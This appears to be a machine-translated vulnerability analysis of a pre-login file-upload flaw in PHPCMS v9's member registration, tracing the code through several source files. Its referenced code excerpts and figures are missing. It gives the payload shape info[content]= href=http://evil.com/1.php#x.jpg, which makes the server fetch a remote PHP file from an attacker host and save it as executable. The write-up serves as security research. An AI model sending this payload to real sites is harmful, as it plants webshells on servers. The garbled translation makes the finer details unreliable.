It is said to be one in the underground has been around for half a 0day, which has recently been broke to, in the membership registration page, that this vulnerability without the need to login you can use, or more powerful.
2 vulnerability analysis:
Follow up on the registration page before you look at the default installation finished phpcmsv9 about member registration settings in member_setting. cache. php file, the content is as follows:
Into the topic, see the registration page code: phpcms\modules\member\index.php
The entry point in the function register:
This part of logic may control the above member registration settings file in the switch to Quick skip, fast-forward to the first 130 rows:
Where in the last line$user_model_info is submitted by the user info variables or arrays obtained after treatment, track down the$user_model_info process, in caches\caches_model\caches_data\member_input. class. php file get method:
$this->fields in the constructor are defined, code is read a cache file content:
The variable$modelid in phpcms\modules\member\index. php defined, the direct can be through POST submission
The variable$modelid control, assigned a value of 1 will from model_field_1. cache. the php file reads the cache configuration, follow model_field_1. cache. php file, the first 262 rows are defined
Back to the get method inside of the$value = $this->$func($field, $value)replaced by a wording that is,$value = editor($field, $value), where$field and$value can be controlled, for the POST info array of key and value.
Then follow the editor method:
Continue to follow the key of the penultimate line of the attachment class of the download methods note that here the first argument$field is the POST method info array the key has been written to death for content, so submit the payload to be shaped such as info[content]=xxxx in the phpcms\libs\classes\attachment. class. php file:
The figure in the penultimate line of the regular roughly means: if the url is not in gif|jpg|jpeg|bmp|png these pictures of suffix endings that just returns the original url, exit, walk less than vulnerability trigger point. (This regular take OF is the 3 the parentheses is matched to the value, such as submission of info[content]= href=http:// evil.com/1.jpg, the matching result is: <http://evil.com/1.jpg)> to.
Then manufacturers went to fillurl method to the url fill full:
Note that the first 300 lines: understand the php code can be found in the above the#of judgment, when the user submits the url contains a#, then just take the#in front of as url.
Omitted the subsequent part of the code, to achieve the function of opening the above url in the http:// the filter is empty, and will be more/replaced with a single/, The final return url with http://. Such as user submitted info[content]= href=http://evil.com/1.php#x.jpg then after fillurl after processing the returned result is http://evil.com/1.php that is not a problem?：） ）
Back to the top is not complete analysis of the download method, the follow-up to take the file suffix of this step fileext: the
Found taken is the last point after the content as a name suffix, a combination of the above analysis can be learned, this time into the logic of the variable$file 为 http://evil.com/1.php, thus obtaining the file suffix will become php.
Continue to look at the download method, the code flow to the 171 line: